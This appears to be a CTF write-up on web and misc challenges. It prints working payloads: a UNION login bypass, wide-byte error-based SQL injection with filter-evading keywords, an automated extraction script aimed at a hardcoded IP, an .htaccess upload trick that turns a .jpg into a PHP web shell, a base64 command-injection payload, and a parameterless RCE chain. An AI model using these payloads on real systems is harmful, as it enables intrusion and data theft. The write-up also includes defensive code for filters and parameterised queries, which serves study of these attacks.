WEB

sql1

Bypass with a UNION SELECT query

Based on the backend statement select * from '$name'

1' union select 1,'admin','md5(123)' &pw=123

sql2

Wide byte + error-based + unknown column name

search.php?name=admin%df' and (seselectlect 1 from  (seselectlect count(*),concat((selselectect e.2 from (selselectect * from (selselectect 1)a,(selselectect 2)b ununionion selselectect * from f14g)e limit 2 offset 0;),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&pw=3

For the final payload, change the row offset and then base64-decode the result; I wrote a script for it

import requests
import re

res = requests.session()

# Walk the rows of f14g one at a time; each response leaks one
# base64-encoded value inside the "Duplicate entry" error message.
for i in range(0, 100):
    url = "http://183.129.189.60:10006/search.php?name=admin%df' and (seselectlect 1 from (seselectlect count(*),concat((selselectect e.2 from (selselectect * from (selselectect 1)a,(selselectect 2)b ununionion selselectect * from f14g)e limit 1 offset " + str(i) + "),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&pw=3"
    re1 = res.get(url=url)
    # findall needs the response body as its second argument
    te = re.findall(r"Error: Duplicate entry '(.*?)1'", re1.text)
    print(re1.text)

Some responses have a trailing 1 and some don't, so I didn't finish the regex extraction part

Decode the results one by one and look for the flag
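The sql2 bypass above works because the keyword blacklist runs once: deleting select from seselectlect leaves select behind. As an added example (not the challenge's or the author's code), here is that weak filter beside two fixes, plus a check of the wide-byte trick that frees the escaped quote; the users table is constructed sample data.

```python
import re
import sqlite3

KEYWORDS = ("select", "union")

def strip_once(s: str) -> str:
    """Single-pass blacklist, the kind sql2's filter bypass defeats:
    deleting 'select' from 'seselectlect' leaves 'select' behind."""
    for kw in KEYWORDS:
        s = re.sub(kw, "", s, flags=re.IGNORECASE)
    return s

def strip_to_fixed_point(s: str) -> str:
    """Repeat the strip until nothing changes. Closes the doubled-keyword
    hole, but a blacklist stays fragile (comments, encodings, new keywords)."""
    while True:
        t = strip_once(s)
        if t == s:
            return t
        s = t

def contains_keyword(s: str) -> bool:
    """Reject instead of sanitise: any match is a reason to refuse the input."""
    return re.search("|".join(KEYWORDS), s, re.IGNORECASE) is not None

def build_demo_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the challenge's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "admin"), (2, "guest")])
    return conn

def lookup_user(conn: sqlite3.Connection, name: str) -> list:
    """Parameterised query: the value is bound as data, so no keyword filter
    is needed and the quote/keyword tricks above simply match no row."""
    return conn.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()

def wide_byte_frees_quote(lead: bytes = b"\xdf") -> bool:
    """The wide-byte half of sql2: addslashes turns %df' into %df\\' and a
    GBK-charset connection reads \\xdf\\x5c as one character, so the quote is
    no longer escaped. True means the escaping was defeated."""
    escaped = lead + b"\\'"            # bytes df 5c 27, what addslashes() emits
    decoded = escaped.decode("gbk")    # how the database sees them
    return len(decoded) == 2 and decoded.endswith("'")
```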

sql3

No idea

upload

Upload a .htaccess file

<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

This makes shell.jpg get parsed as PHP

Then upload a shell.jpg

You have to keep uploading because the server keeps deleting files; it's a nested challenge: upload the .htaccess first, then the image

import requests

res = requests.session()
url = ''  # target URL, left blank in the original

# Keep re-sending the request: the server deletes files constantly,
# so the loop wins the race once .htaccess and shell.jpg are both in place.
while True:
    resp = res.post(url=url, data={"shell": "var_dump(readfile('/flag'));"})
    print(resp.text)

Keep requesting it

ping

Command injection bypass

Spaces, single quotes and {} are filtered

payload

echo$IFS$9Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh

Nested challenge

Parameterless execution (no-argument RCE)

show_source(next(array_reverse(scandir(pos(localeconv())))));

MISC

佛系青年

Pseudo-encryption: fix the file header

gakki

Carve with foremost, brute-force the archive password, word-frequency analysis

Not sure why, but I've never once managed to crack the archive password